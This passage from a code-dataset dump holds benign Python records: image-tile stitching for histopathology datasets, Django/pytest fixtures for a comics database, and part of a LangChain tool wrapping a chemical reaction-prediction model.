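s = 0
for c in counts:
    s += c
    cum_sum.append(s)                   # -> [4, 6, 11]

def locate(idx):
    file_idx = bisect.bisect_right(cum_sum, idx)
    local = idx if file_idx == 0 else idx - cum_sum[file_idx - 1]
    return file_idx, local

assert locate(0) == (0, 0)
assert locate(4) == (1, 0)
assert locate(10) == (2, 4)
```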
        #    v1, v2 = v.shape\n        #    length += (v1 - self.border + 1) * (v2 - self.border + 1)\n        #return int(length)\n\n    # abstract\n    def cal_seq_len(self, image):\n        s1, s2 = image.shape\n        return int((s1 - self.border + 1) * (s2 - self.border + 1))\n\n    # abstract\n    @property\n    def file_prefixes(self):\n        res = []\n        for k, v in self.file_grids.items():\n            res.append(k)\n        return res\n\n    # abstract\n    @property\n    def cum_sum(self):\n        res = []\n        s = 0\n        for k, v in self.file_grids.items():\n            #v1, v2 = v.shape\n            length = self.cal_seq_len(v)\n            res.append(length + s)\n            s += length\n        return res\n\n    # abstract\n    @property\n    def cluster_files(self):\n        file_prefix = dict()\n        for file_name in self.file_names:\n            base_name = os.path.basename(file_name)\n            prefix = base_name.split('_grade_')[0]\n            if prefix not in file_prefix:\n                file_prefix[prefix] = []\n            file_prefix[prefix].append(file_name)\n\n        return file_prefix\n\n\n    # abstract\n    def construct_grids(self):\n        file_clusters = self.cluster_files\n        #print(image_clusters)\n\n        def row_col(path):\n            base_name = os.path.basename(path)\n            row, col = re.search(r'_row_([0-9]+)_col_([0-9]+)', path).groups()\n            return int(row), int(col)\n\n        for k, v in file_clusters.items():\n            file_grids = []\n            v = sorted(v, key=row_col)\n            last_row = 0\n            row = []\n            for elem in v:\n                r_idx, _ = row_col(elem)\n                if last_row != r_idx:\n                    file_grids.append(np.array(row))\n                    last_row = r_idx\n                    row = []\n\n                row.append(elem)\n\n            file_grids.append(np.array(row))\n            file_clusters[k] = np.array(file_grids)\n\n        return file_clusters\n\n    def prefix2image_name(self, prefix):\n        \"\"\"Return the top-left tile path of the full-size image.\"\"\"\n        v = self.file_grids[prefix]\n        return v[0, 0]\n\n    def whole_file(self, prefix):\n        #for idx, (k, v) in enumerate(self.file_grids.items()):\n        prefix = str(prefix)\n        v = self.file_grids[prefix]\n        return self.stich_files(v)\n\n\nclass ImageDataset(BaseDataset):\n    #def stich_files\n\n    def assert_data(self, image):\n        assert image.shape[0] == self.image_size\n        assert image.shape[1] == self.image_size\n\n    def stich_files(self, patch):\n        row, col = patch.shape\n        h = []\n        v = []\n        for r_idx in range(row):\n            for c_idx in range(col):\n                path = patch[r_idx, c_idx]\n                #image = cv2.imread(path, -1)\n                image = self.file_list.read_file(path)\n                h.append(image)\n            image = np.hstack(h)\n            v.append(image)\n            h = []\n        image = np.vstack(v)\n        return image\n\n    # not abstract\n    def vis_image(self, ori_folder, save_folder):\n        #ori_folder = self.file_list.path\n        for idx, (k, v) in enumerate(self.file_grids.items()):\n\n            base_name = os.path.basename(k + '.png')\n            src_image = cv2.imread(os.path.join(ori_folder, base_name), -1)\n\n            stich_image = self.stich_files(v)\n\n            assert stich_image.shape == src_image.shape\n\n            image = np.hstack([stich_image, src_image])\n            image = cv2.resize(image, (0, 0), fx=0.3, fy=0.3)\n\n\n            cv2.imwrite(os.path.join(save_folder, base_name), image)\n\nclass LMDBDataset(BaseDataset):\n    def assert_data(self, val):\n        assert 'feat' in val\n        assert 'coord' in val\n\n    def stich_files(self, patch):\n        #res = []\n        node_features = []\n        node_coords = []\n\n        #print(patch)\n        #for fp in patch.flatten():\n        row, col = patch.shape[:2]\n        for r_idx in range(row):\n            for c_idx in range(col):\n                fp = patch[r_idx, c_idx]\n                nodes = self.file_list.read_file(fp)\n                #print(r_idx, c_idx, len(nodes))\n                #for node in nodes:\n                # centroid [x, y] # /data/by/tmp/hover_net/models/hovernet/post_proc.py process\n                #node['centroid'][0] /= 2\n                #node['centroid'][1] /= 2\n                #print(node['centroid'])\n                nodes['coord'][:, 0] += r_idx * 224 * 2\n                nodes['coord'][:, 1] += c_idx * 224 * 2\n                #node['bbox'][0][0]\n                
#node['bbox'][0][0] += r_idx * 224 * 2\n #node['bbox'][0][1] += c_idx * 224 * 2\n #node['bbox'][1][0] += r_idx * 224 * 2\n #node['bbox'][1][1] += c_idx * 224 * 2\n\n #print(node['contour'])\n #print(type(node['contour']))\n #node['contour'][:, 0] += r_idx * 224 * 2\n #node['contour'][:, 1] += c_idx * 224 * 2\n #print(node['contour'])\n #node['contour'] = [[c1 + c_idx * 224 * 2, c2 + r_idx * 224 * 2] for [c1, c2] in node['contour']]\n #print(node['contour'])\n\n #import sys; sys.exit()\n\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n #print(node['centroid'])\n node_features.append(nodes['feat'])\n node_coords.append(nodes['coord'])\n #res.append(nodes)\n # with open(fp) as f:\n # data = json.load(fp)\n # for v in data['nuc'].values():\n # res.append(v)\n node_features = np.vstack(node_features)\n node_coords = np.vstack(node_coords)\n #print(res[33], 333333333)\n\n return {'feat' : node_features, 'coord' : node_coords}\n\nclass PtDataset(BaseDataset):\n def assert_data(self, data):\n assert 'feat' in data\n assert 'coord' in data\n\n def stich_files(self, patch, scale=2):\n res = {\n 'feat' : [],\n 'coord' : []\n }\n row, col = patch.shape[:2]\n for r_idx in range(row):\n for c_idx in range(col):\n fp = patch[r_idx, c_idx]\n data = self.file_list.read_file(fp)\n assert len(data['feat']) == len(data['coord'])\n feat = data['feat']\n coord = data['coord']\n if len(data['feat']) != 0:\n coord[:, 1] += c_idx * 224 * scale\n coord[:, 0] += r_idx * 224 * scale\n\n res['feat'].append(feat)\n res['coord'].append(coord)\n\n res['feat'] = torch.cat(res['feat'], dim=0)\n res['coord'] = torch.cat(res['coord'], dim=0)\n\n return res\n\n\nclass JsonDataset(BaseDataset):\n def assert_data(self, data):\n assert len(data) > 0\n assert type(data) == list\n\n def stich_files(self, patch, scale=2):\n res = []\n\n #for fp in patch.flatten():\n row, col = patch.shape[:2]\n for r_idx in range(row):\n for c_idx in range(col):\n fp = patch[r_idx, c_idx]\n nodes = self.file_list.read_file(fp)\n for node in nodes:\n # centeroid [x, y] # /data/by/tmp/hover_net/models/hovernet/post_proc.py process\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n\n # unit_size = 224 * 2\n node['centroid'][0] += c_idx * 224 * scale\n node['centroid'][1] += r_idx * 224 * scale\n #node['bbox'][0][0]\n node['bbox'][0][0] += r_idx * 224 * scale\n node['bbox'][0][1] += c_idx * 224 * scale\n node['bbox'][1][0] += r_idx * 224 * scale\n node['bbox'][1][1] += c_idx * 224 * scale\n\n #node['contour'][:, 0] += r_idx * 224 * 2\n #node['contour'][:, 1] += c_idx * 224 * 2\n #print(node['contour'])\n # contour: (x,y)\n node['contour'] = [[c1 + c_idx * 224 * scale, c2 + r_idx * 224 * scale] for [c1, c2] in node['contour']]\n #print(node['contour'])\n\n #import sys; sys.exit()\n\n #node['centroid'][0] /= 2\n #node['centroid'][1] /= 2\n #print(node['centroid'])\n res.append(node)\n # with open(fp) as f:\n # data = json.load(fp)\n # for v in data['nuc'].values():\n # res.append(v)\n #print(res[33], 333333333)\n\n return res\n #for i in v:\n #print(i)\n #print(i)\n #pass\n\n #print(len(image_clusters.keys()))\n #print(type(image_clusters.values()))\n\ndef draw_nuclei(image, json_label):\n #print(json_label)\n for node in json_label:\n #print(11, node)\n cen = node['centroid']\n image = cv2.circle(image, tuple(cen), 3, (0, 200, 0), cv2.FILLED, 1)\n # print(node['centroid'], node['bbox'])\n\n # cnt = [cnt // 2 for cnt in ]\n # node['contour'] = [[c1 // 2, c2 // 2] for [c1, c2] in contour]\n # cnt = [[c1 // 2, c2 // 2] for [c1, c2] in 
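An aside on the coordinate shift used by the stich_files variants above, isolated: nuclei detected inside tile (r_idx, c_idx) carry tile-local coordinates, and adding the tile origin places them in the stitched image. The tile size and scale follow the record's 224 * 2 convention; the arrays are illustrative.

```python
import numpy as np

TILE, SCALE = 224, 2

def to_global(coords, r_idx, c_idx):
    out = coords.copy()
    out[:, 0] += r_idx * TILE * SCALE   # row offset of the tile origin
    out[:, 1] += c_idx * TILE * SCALE   # column offset of the tile origin
    return out

local = np.array([[10, 20], [30, 40]])
assert (to_global(local, 1, 2) == np.array([[458, 916], [478, 936]])).all()
```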
node['contour']]\n\n # image = cv2.drawContours(image, [np.array(cnt)], -1, 255, -1)\n\n\n return image\n\n#image_folder = ImageFolder('/home/baiyu/Extended_CRC')\n#image_dataset = ImageDataset(image_folder, 224 * 3)\n#lmdb_folder = LMDBFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_lmdb/extended_crc/feat/')\n#feat_dataset = LMDBDataset(lmdb_folder, 224 * 3)\n#print(len(image_dataset))\n#print(len(feat_dataset))\n\n#import random\n#path, image = random.choice(image_dataset)\n#\n#print(path)\n#base_name = os.path.basename(path).replace('.png', '.npy')\n#lmdb_folder = '/data/smb/syh/PycharmProjects/CGC-Net/data_lmdb/extended_crc/feat/'\n#\n#image_path = Path(path)\n#sub_folder = os.path.dirname(image_path.relative_to('/home/baiyu/Extended_CRC'))\n#print(sub_folder)\n#\n#\n#npy_path = os.path.join(sub_folder, base_name)\n##print(npy_path)\n#_, res = feat_dataset.get_file_by_path(npy_path)\n#coords = res['coord']\n#for cen in coords:\n# cen = [int(c // 2) for c in cen]\n# image = cv2.circle(image, tuple(cen[::-1]), 3, (0, 200, 0), cv2.FILLED, 3)\n#\n#cv2.imwrite('/home/baiyu/HGIN/heihei_del11.png', image)\n\n\n\n#print(res)\n#s = image_dataset.file_prefixes\n#print(s[10])\n#print(path)\n#s = feat_dataset.file_prefixes\n#print(s[10])\n#s = feat_dataset.get_file_by_path\n#image_dataset.vis_image('/data/smb/数据集/结直肠/病理学/Extended_CRC/Original_Images/', 'tmp')\n#sys.exit()\n#\n##json_folder = JsonFolder('/data/by/tmp/hover_net/samples/out/fold')\n# json_folder = JsonFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_su/raw/Extended_CRC/mask/fold_1/1_normal')\n# print('ffffff')\n# json_folder = JsonFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Json/EXtended_CRC_Mask')\n# print('fffffffffff')\n# json_dataset = JsonDataset(json_folder, 1792)\n# json_path, label = json_dataset[33]\n# print(len(label), json_path)\n#\n#print(len(json_dataset))\n#print(len(image_dataset))\n#a = json_dataset[33]\n#\n#image_files = image_datasnt.file_path_lists\n#json_files = json_dataset.file_path_lists\n#\n#print('json_files', len(json_files))\n#print('image_files', len(image_files))\n#json_path = json_files[0]\n#\n#json_dir = os.path.dirname(json_path)\n#\n#\n#image_fp = image_files[1111]\n#\n#image_name = os.path.basename(image_fp)\n#\n#json_path = os.path.join(json_dir, image_name.replace('.png', '.json'))\n#\n##print(os.path.basename(json_path), os.path.basename(image_fp))\n#print(image_fp)\n#json_label = json_dataset.get_file_by_path(json_path)[1]\n##print(type(json_label), len(json_label), json_label[0], 444444, json_path)\n#image = image_dataset.get_file_by_path(image_fp)[1]\n#\n#\n#print(len(json_label))\n#image = draw_nuclei(image, json_label)\n#print('ffffffffffffffffffffffffffffff')\n##cv2.imwrite('test1_new.png', image)\n#\n#\n#\n#\n#\n#\n#\n#\n##for i in range(300):\n## image_dataset.vis_image('/data/smb/数据集/结直肠/病理学/Extended_CRC/Original_Images/', 'tmp')\n#\n#\n##image_folder = ImageFolder('test_can_be_del2/')\n##dataset = BaseDataset(image_folder, 224)\n##print(len(dataset))\n###\n##for i in range(300):\n## dataset.vis_image(i, '/data/smb/数据集/结直肠/病理学/Extended_CRC/Original_Images/', 'test_can_be_del')\n##for idx, image in enumerate(dataset):\n# #pass\n##image = dataset[2200]\n##\n##cv2.imwrite('test.png', image)\n##\n##image_names = dataset.image_names\n##print(len(image_names))\n#\n# #print(image.shape)\n# #cv2.imwrite('test_can_be_del/test{}.png'.format(idx), image)\n#\n\n\n#path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Feat_hand_crafted/0/'\n#\n#\n#\n#folder = 
PtFolders(path)\n#dataset = PtDataset(folder, 224 * 8)\n#print(len(dataset))\n#import random\n#path, data = random.choice(dataset)\n##data = dataset[33][1]\n##path = dataset[33][0]\n#print(path)\n# image_folder = ImageFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images')\n# img_dataset = ImageDataset(image_folder, 224 * 8)\n# res = img_dataset[33]\n# img_dataset.get_file_by_path()\n# image_path = os.path.basename(json_path).replace('.json', '.png')\n# image = img_dataset.get_file_by_path(os.path.join('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Json/EXtended_CRC_Mask', image_path))\n\n\n# print(res[1].shape, res[0])\n\n# image = res[1]\n# image = cv2.resize(image, (0, 0), fx=2, fy=2)\n# image = draw_nuclei(image, label)\n# image = cv2.resize(image, (0, 0), fx=0.5, fy=0.5)\n# cv2.imwrite('aa.jpg', image)\n#image_path = path.replace('Feat_hand_crafted', 'Images').replace('.pt', '.png').replace('0/', '')\n##print(path)\n##print(image_path)\n#\n# print(len(img_dataset), len(json_dataset))\n##image = img_dataset[33][1]\n#image = img_dataset.get_file_by_path(image_path)\n#image = cv2.resize(image, (0, 0), fx=2, fy=2)\n#\n#print(type(data), len(data))\n##image = cv2.imread(image_path)\n#print(image.shape)\n#coord = data['coord']\n#for c in coord:\n# #print(c)\n# image = cv2.circle(image, tuple(c.tolist()[::-1]), 3, (330, 0, 0), 3)\n#\n#image = cv2.resize(image, (0, 0), fx=0.3, fy=0.3)\n#cv2.imwrite('fff.jpg', image)\n##for k, v in data.items():\n## print(k, v.shape)\n#\n#\n##for k in data['coord']:\n## print(k)\n#\n#\n#\n##path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Feat_hand_crafted/0/'\n##image_path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images/'\n##\n##count = 0\n##for i in glob.iglob(os.path.join(path, '**', '*.pt'), recursive=True):\n## count += 1\n## if count != 10000:\n## continue\n## print(i)\n## dirname = os.path.dirname(i)\n## basename = os.path.basename(i)\n## dirnames = dirname.split('/')[-2:]\n## print(dirnames)\n## img_fp = os.path.join(image_path, *dirnames, basename.replace('.pt', '.png'))\n## print(img_fp)\n## image = cv2.imread(img_fp)\n##\n## image = cv2.resize(image, (0, 0), fx=2, fy=2)\n## data = torch.load(i)\n## coord = data['coord']\n## #print(coord.shape)\n## #print(coord[:, 0].shape)\n## for c in coord:\n## #print(c)\n## image = cv2.circle(image, tuple(c.tolist()[::-1]), 3, (330, 0, 0), 3)\n##\n## cv2.imwrite('fff.jpg', image)\n## break\n#\n\n\n#image_folder = ImageFolder('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images/')\n#dataset = ImageDataset(image_folder, 1792)\n#\n##print(len(dataset))\n#image = dataset.get_file_by_path('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images/fold_3/3_high_grade/Grade3_Patient_172_9_grade_3_row_2688_col_4256.png')\n#print(image.shape)\n#cv2.imwrite('ecrc.jpg', image)\n\n\n\n\nif __name__ == '__main__':\n image_path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images'\n json_path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Json/EXtended_CRC_Mask'\n\n image_folder = ImageFolder(image_path)\n image_dataset = ImageDataset(image_folder, 224 * 8)\n image_path, image = image_dataset[44]\n\n\n json_folder = JsonFolder(json_path)\n json_dataset = JsonDataset(json_folder, 224 * 8)\n json_fp = os.path.join(json_path, os.path.basename(image_path).replace('.png', '.json'))\n json_label = json_dataset.get_file_by_path(json_fp)\n\n # image = cv2.resize(image, (0, 0), fx=2, fy=2)\n image = draw_nuclei(image, json_label)\n # image = 
cv2.resize(image, (0, 0), fx=0.5, fy=0.5)\n cv2.imwrite('aa.jpg', image)\n","repo_name":"suyouooooo/HAT-Net","sub_path":"dataflow/stich.py","file_name":"stich.py","file_ext":"py","file_size_in_byte":23464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"70592669429","text":"import uuid\nfrom datetime import date, datetime\n\nimport pytest\nfrom django.core.management import call_command\nfrom django.utils import timezone\n\nfrom comicsdb.models.arc import Arc\nfrom comicsdb.models.character import Character\nfrom comicsdb.models.creator import Creator\nfrom comicsdb.models.credits import Role\nfrom comicsdb.models.issue import Issue\nfrom comicsdb.models.publisher import Publisher\nfrom comicsdb.models.series import Series, SeriesType\nfrom comicsdb.models.team import Team\nfrom users.models import CustomUser\n\nNUMBER_OF_ISSUES = 35\n\n\n@pytest.fixture()\ndef test_password():\n return \"strong-test-pass\"\n\n\n@pytest.fixture()\ndef test_email():\n return \"foo@bar.com\"\n\n\n@pytest.fixture()\ndef create_user(db, test_password, test_email):\n def make_user(**kwargs):\n kwargs[\"password\"] = test_password\n kwargs[\"email\"] = test_email\n if \"username\" not in kwargs:\n kwargs[\"username\"] = str(uuid.uuid4())\n return CustomUser.objects.create_user(**kwargs)\n\n return make_user\n\n\n@pytest.fixture()\ndef create_staff_user(create_user):\n user: CustomUser = create_user()\n user.is_staff = True\n user.save()\n return user\n\n\n@pytest.fixture()\ndef auto_login_user(db, client, create_user, test_password):\n def make_auto_login(user=None):\n if user is None:\n user = create_user()\n client.login(username=user.username, password=test_password)\n return client, user\n\n return make_auto_login\n\n\n@pytest.fixture()\ndef api_client():\n from rest_framework.test import APIClient\n\n return APIClient()\n\n\n@pytest.fixture()\ndef api_client_with_credentials(db, create_user, api_client):\n user = create_user()\n api_client.force_authenticate(user=user)\n yield api_client\n api_client.force_authenticate(user=None)\n\n\n@pytest.fixture()\ndef api_client_with_staff_credentials(db, create_staff_user, api_client):\n api_client.force_authenticate(user=create_staff_user)\n yield api_client\n api_client.force_authenticate(user=None)\n\n\n@pytest.fixture()\ndef wwh_arc(create_user):\n user = create_user()\n return Arc.objects.create(name=\"World War Hulk\", slug=\"world-war-hulk\", edited_by=user)\n\n\n@pytest.fixture()\ndef fc_arc(create_user):\n user = create_user()\n return Arc.objects.create(name=\"Final Crisis\", slug=\"final-crisis\", edited_by=user)\n\n\n@pytest.fixture()\ndef dc_comics(create_user):\n user = create_user()\n return Publisher.objects.create(name=\"DC Comics\", slug=\"dc-comics\", edited_by=user)\n\n\n@pytest.fixture()\ndef marvel(create_user):\n user = create_user()\n return Publisher.objects.create(name=\"Marvel\", slug=\"marvel\", edited_by=user)\n\n\n@pytest.fixture(scope=\"session\")\ndef django_db_setup(django_db_setup, django_db_blocker):\n with django_db_blocker.unblock():\n call_command(\"loaddata\", \"../fixtures/series_type.yaml\")\n\n\n@pytest.fixture()\ndef cancelled_type(db):\n return SeriesType.objects.get(name=\"Cancelled Series\")\n\n\n@pytest.fixture()\ndef fc_series(create_user, dc_comics, cancelled_type):\n user = create_user()\n return Series.objects.create(\n name=\"Final Crisis\",\n slug=\"final-crisis\",\n publisher=dc_comics,\n volume=\"1\",\n year_began=1939,\n series_type=cancelled_type,\n 
edited_by=user,\n )\n\n\n@pytest.fixture()\ndef bat_sups_series(create_user, dc_comics, cancelled_type):\n user = create_user()\n return Series.objects.create(\n name=\"Batman / Superman\",\n slug=\"batman-superman\",\n publisher=dc_comics,\n volume=\"1\",\n year_began=2016,\n series_type=cancelled_type,\n edited_by=user,\n )\n\n\n@pytest.fixture()\ndef issue_with_arc(create_user, fc_series, fc_arc, superman):\n user = create_user()\n i = Issue.objects.create(\n series=fc_series,\n number=\"1\",\n slug=\"final-crisis-1\",\n cover_date=timezone.now().date(),\n edited_by=user,\n created_by=user,\n )\n i.arcs.add(fc_arc)\n i.characters.add(superman)\n return i\n\n\n@pytest.fixture()\ndef basic_issue(create_user, fc_series):\n user = create_user()\n return Issue.objects.create(\n series=fc_series,\n number=\"1\",\n slug=\"final-crisis-1\",\n cover_date=timezone.now().date(),\n edited_by=user,\n created_by=user,\n )\n\n\n@pytest.fixture()\ndef list_of_issues(create_user, fc_series):\n user = create_user()\n\n # Create the store date for this week\n year, week, _ = date.today().isocalendar()\n # The \"3\" is the weekday (Wednesday)\n wednesday = f\"{year}-{week}-3\"\n # Dates used in Issue creating\n in_store_date = datetime.strptime(wednesday, \"%G-%V-%u\")\n cover_date = date.today()\n\n for i_num in range(NUMBER_OF_ISSUES):\n Issue.objects.create(\n series=fc_series,\n number=i_num,\n slug=f\"final-crisis-1939-{i_num}\",\n cover_date=cover_date,\n store_date=in_store_date,\n edited_by=user,\n created_by=user,\n )\n\n\n@pytest.fixture()\ndef superman(create_user):\n user = create_user()\n return Character.objects.create(name=\"Superman\", slug=\"superman\", edited_by=user)\n\n\n@pytest.fixture()\ndef batman(create_user):\n user = create_user()\n return Character.objects.create(name=\"Batman\", slug=\"batman\", edited_by=user)\n\n\n@pytest.fixture()\ndef john_byrne(create_user):\n user = create_user()\n return Creator.objects.create(name=\"John Byrne\", slug=\"john-byrne\", edited_by=user)\n\n\n@pytest.fixture()\ndef walter_simonson(create_user):\n user = create_user()\n return Creator.objects.create(\n name=\"Walter Simonson\", slug=\"walter-simonson\", edited_by=user\n )\n\n\n@pytest.fixture()\ndef teen_titans(create_user):\n user = create_user()\n return Team.objects.create(name=\"Teen Titans\", slug=\"teen-titans\", edited_by=user)\n\n\n@pytest.fixture()\ndef avengers(create_user):\n user = create_user()\n return Team.objects.create(name=\"The Avengers\", slug=\"the-avengers\", edited_by=user)\n\n\n@pytest.fixture()\ndef writer(db):\n return Role.objects.create(name=\"Writer\", notes=\"Nothing here.\", order=20)\n","repo_name":"bpepple/metron","sub_path":"comicsdb/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"94"} +{"seq_id":"70838006711","text":"from langchain.tools import BaseTool\nfrom transformers import AutoTokenizer, T5ForConditionalGeneration\nfrom .NERF.preprocess import molecule\nfrom .NERF.model import *\nfrom .NERF.dataset import TransformerDataset\nfrom torch.utils.data import DataLoader\nfrom rdkit import Chem\nfrom .NERF.utils import result2mol\nfrom rdkit import Chem\nimport openai\nimport os\nimport argparse\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import Draw\nfrom rdkit.Chem.Draw import rdMolDraw2D\nfrom rdkit.Chem import rdDepictor\n\nrdDepictor.SetPreferCoordGen(True)\nfrom rdkit.Chem.Draw import 
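An aside on the conftest.py record above: it leans on the pytest "factory fixture" pattern, where a fixture returns a callable so each test can build as many customized objects as it needs. A minimal self-contained sketch (no Django required); the dict stand-in replaces CustomUser.objects.create_user.

```python
import uuid
import pytest

@pytest.fixture()
def make_user():
    created = []

    def _make(**kwargs):
        kwargs.setdefault("username", str(uuid.uuid4()))
        user = dict(kwargs)          # stand-in for CustomUser.objects.create_user
        created.append(user)
        return user

    yield _make
    created.clear()                  # teardown hook, if cleanup were needed

def test_two_users(make_user):
    a, b = make_user(), make_user(is_staff=True)
    assert a["username"] != b["username"]
    assert b["is_staff"]
```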
IPythonConsole\nfrom IPython.display import SVG\nimport rdkit\n\nparser = argparse.ArgumentParser(description='')\n\ncheck_point = [\"epoch-98-loss-1.1171849480149887\"]\n\nparser.add_argument('--data_path', type=str, help='path of dataset', default='./')\nparser.add_argument('--batch_size', type=int, default=128, help='batch_size.256')\nparser.add_argument('--shuffle', action='store_true', default=False, help='shuffle the order of atoms')\nparser.add_argument('--num_workers', type=int, default=4, help='num workers to generate data.')\nparser.add_argument('--prefix', type=str, default='data',\n help='data prefix')\n\nparser.add_argument('--name', type=str, default='tmp',\n help='model name, crucial for test and checkpoint initialization')\nparser.add_argument('--vae', action='store_true', default=True, help='use vae')\nparser.add_argument('--depth', type=int, default=6, help='depth')\nparser.add_argument('--dim', type=int, default=192, help='dim')\n\nparser.add_argument('--save_path', type=str, default='../tools/NERF/CKPT/no_reactant_mask/', help='path of save prefix')\nparser.add_argument('--train', action='store_true', default=False, help='do training.')\nparser.add_argument('--save', action='store_true', default=True, help='Save model.')\nparser.add_argument('--eval', action='store_true', default=True, help='eval model.')\nparser.add_argument('--test', action='store_true', default=True, help='test model.')\nparser.add_argument('--recon', action='store_true', default=False, help='test reconstruction only.')\n\nparser.add_argument('--seed', type=int, default=2019, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200, help='Number of epochs to train. 200')\nparser.add_argument('--local_rank', default='cpu', help='rank')\nparser.add_argument('--lr', type=float, default=5e-4, help='Initial learning rate.')\nparser.add_argument('--temperature', type=list, default=[0], nargs='+', help='temperature.')\nparser.add_argument('--dropout', type=float, default=0., help='Dropout rate (1 - keep probability).')\nparser.add_argument('--beta', type=float, default=0.1, help='the weight of kl')\nparser.add_argument('--checkpoint', type=str, default=check_point, nargs='*',\n help='initialize from a checkpoint, if None, do not restore')\nparser.add_argument('--world_size', type=int, default=1, help='number of processes')\n# args = parser.parse_args()\nargs = parser.parse_args(args=[])\n\n\ndef clear_atom_map_smiles(smiles_with_atom_map):\n mol = Chem.MolFromSmiles(smiles_with_atom_map)\n for atom in mol.GetAtoms():\n atom.ClearProp('molAtomMapNumber')\n return Chem.MolToSmiles(mol)\n\n\ndef need_atom_mapping(smiles):\n mol = Chem.MolFromSmiles(smiles)\n\n if mol is None:\n return True\n\n for atom in mol.GetAtoms():\n atom_map_num = atom.GetAtomMapNum()\n if atom_map_num != 0:\n return False\n return True\n\n\nclass NERF_non_reactant_mask(BaseTool):\n name = 'NERF_non_reactant_mask'\n description = (\n 'Use NERF_non_reactant_mask tool to Predict the product of a chemical reaction when only reactants are known and the reagents are unknown. 
' +\n        ' input SMILES string only, output the change of bonds and the SMILES of predicted products')\n    checkpoint = \"epoch-98-loss-1.1171849480149887\"\n\n    def map_atoms_in_smiles(self, smiles):\n        mol = Chem.MolFromSmiles(smiles)\n\n        if mol is None:\n            return None\n\n        atom_map = {}\n        for atom in mol.GetAtoms():\n            atom.SetAtomMapNum(atom.GetIdx() + 1)\n            atom_map[atom.GetIdx()] = atom.GetIdx() + 1\n\n        mapped_smiles = Chem.MolToSmiles(mol, canonical=True, isomericSmiles=True)\n        return mapped_smiles\n\n    def process_smiles(self, smiles, reactant_mask=None):\n        # apply atom mapping when needed (map_atoms=True means the SMILES is not mapped yet)\n        # reactant_mask is a list whose length is the number of molecules: 1 for reactant, 0 for reagent\n        map_atoms = need_atom_mapping(smiles)\n        if map_atoms:\n            smiles_atom_mapped = self.map_atoms_in_smiles(smiles)\n            smiles_no_atom_mapped = smiles\n        else:\n            smiles_no_atom_mapped = clear_atom_map_smiles(smiles)\n            smiles_atom_mapped = smiles\n\n        reactant_mols = [Chem.MolFromSmiles(item) for item in smiles_atom_mapped.split(\".\")]\n        reactant_len = Chem.MolFromSmiles(smiles_atom_mapped).GetNumAtoms()\n\n        reactant_features = molecule(reactant_mols, reactant_len, reactant_mask)\n\n        element = reactant_features['element']\n        mask = reactant_features['mask']\n        bond = reactant_features['bond']\n        aroma = reactant_features['aroma']\n        charge = reactant_features['charge']\n\n        input_data = {}\n        for key in reactant_features:\n            if key in [\"element\", \"reactant\"]:\n                input_data[key] = reactant_features[key]\n            else:\n                input_data['src_' + key] = reactant_features[key]\n\n        data = [input_data]\n\n        full_dataset = TransformerDataset(False, data)\n\n        data_loader = DataLoader(full_dataset,\n                                 batch_size=1,\n                                 num_workers=4, collate_fn=TransformerDataset.collate_fn)\n\n        return data_loader, element, mask, bond, aroma, charge, smiles_atom_mapped, smiles_no_atom_mapped\n\n    def init_model(self, save_path, checkpoint):\n        state_dict = {}\n        map_location = {'cuda:%d' % 0: 'cuda:%d' % 0}\n        checkpoint = torch.load(os.path.join(save_path, checkpoint), map_location=map_location)\n        for key in checkpoint['model_state_dict']:\n            if key in state_dict:\n                state_dict[key] += checkpoint['model_state_dict'][key]\n            else:\n                state_dict[key] = checkpoint['model_state_dict'][key]\n\n        model = MoleculeVAE(args, 100, 192, 6).to('cpu')  # TODO\n        model.load_state_dict(state_dict)\n\n        return model\n\n    def predict(self, data_loader,\n                save_path='../chemagent/tools/NERF/CKPT/no_reactant_mask/tmp/', checkpoint=checkpoint, temperature=0):\n\n        model = self.init_model(save_path, checkpoint)\n\n        for data in data_loader:  # only one batch\n            data_gpu = {}\n            for key in data:\n                data_gpu[key] = data[key].to('cpu')\n\n            predicted_dict = model('sample', data_gpu, temperature)\n\n            element = data['element']\n            src_mask = data['src_mask']\n            pred_bond = predicted_dict['bond'].cpu()\n            pred_aroma, pred_charge = predicted_dict['aroma'].cpu(), predicted_dict['charge'].cpu()\n\n            arg_list = [(element[j], src_mask[j], pred_bond[j], pred_aroma[j], pred_charge[j], None) for j in\n                        range(1)]\n\n            res = map(result2mol, arg_list)\n            res = list(res)\n\n            for item in res:\n                mol, smile, valid, smile_no_map = item[0], item[1], item[2], item[3]\n\n        return mol, smile, valid, pred_bond, pred_aroma, pred_charge, smile_no_map\n\n    def pred_from_smiles(self, smiles,\n                         reactant_mask=None):  # TODO: return mol_ori(atom_mapping & same idx with element) and mol_pred\n        # the processed SMILES is atom mapped\n        dl, element, src_mask, src_bond, src_aroma, src_charge, smile_atom_map, smile_no_atom_map = self.process_smiles(\n            smiles, reactant_mask)\n
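An aside demonstrating the atom-map round trip that map_atoms_in_smiles and clear_atom_map_smiles implement above, reduced to a few lines. Ethanol is just an illustrative molecule, and SetAtomMapNum(0) is used here instead of ClearProp('molAtomMapNumber'); both remove the map number.

```python
from rdkit import Chem

mol = Chem.MolFromSmiles("CCO")                 # ethanol
for atom in mol.GetAtoms():
    atom.SetAtomMapNum(atom.GetIdx() + 1)
mapped = Chem.MolToSmiles(mol)                  # e.g. '[CH3:1][CH2:2][OH:3]'

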